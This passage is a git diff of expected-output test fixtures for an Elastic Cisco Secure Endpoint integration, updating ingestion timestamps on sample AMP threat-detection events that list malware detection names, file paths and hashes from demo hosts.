"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -2796,7 +2796,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337215400Z", + "ingested": "2021-12-14T14:40:41.774859341Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -2886,7 +2886,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337220Z", + "ingested": "2021-12-14T14:40:41.774859795Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -2972,7 +2972,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337244600Z", + "ingested": "2021-12-14T14:40:41.774860380Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -3062,7 +3062,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337250700Z", + "ingested": "2021-12-14T14:40:41.774860807Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -3142,7 +3142,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337256700Z", + "ingested": "2021-12-14T14:40:41.774861219Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", @@ -3228,7 +3228,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337262700Z", + "ingested": "2021-12-14T14:40:41.774861639Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -3308,7 +3308,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337268600Z", + "ingested": "2021-12-14T14:40:41.774862049Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", @@ -3388,7 +3388,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337274600Z", + "ingested": "2021-12-14T14:40:41.774862464Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", @@ -3468,7 +3468,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337280500Z", + "ingested": "2021-12-14T14:40:41.774862876Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "code": "1090519054", "kind": "alert", @@ -3558,7 +3558,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337286500Z", + "ingested": "2021-12-14T14:40:41.774863330Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -3644,7 +3644,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337292400Z", + "ingested": "2021-12-14T14:40:41.774863767Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -3734,7 +3734,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337298300Z", + "ingested": "2021-12-14T14:40:41.774864200Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", @@ -3820,7 +3820,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:36.337304300Z", + "ingested": "2021-12-14T14:40:41.774864733Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "code": "1090519054", "kind": "alert", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json index f413457f352..2767b10af51 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp4.log-expected.json @@ -38,7 +38,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.763772800Z", + "ingested": "2021-12-14T14:40:45.520850552Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6508397899087348000,\"timestamp\":1610659036,\"timestamp_nanoseconds\":295927133,\"date\":\"2021-01-14T21:17:16+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.6A37D750F0-100.SBX.TG\",\"detection_id\":\"6508397899087347713\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"resume.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\resume.exe\",\"identity\":{\"sha256\":\"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86\",\"sha1\":\"5ca4bef8de6def53519d4b22632675bb4c1e470b\",\"md5\":\"41476df3138717868118d8542cf3d1d6\"}}}}", "code": "553648147", "kind": "alert", @@ -117,7 +117,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:39.763777600Z", + "ingested": "2021-12-14T14:40:45.520853328Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14930696955218,\"timestamp\":1610656706,\"timestamp_nanoseconds\":844899579,\"date\":\"2021-01-14T20:38:26+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.E4FCCBFA69-95.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610656706,\"start_date\":\"2021-01-14T20:38:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\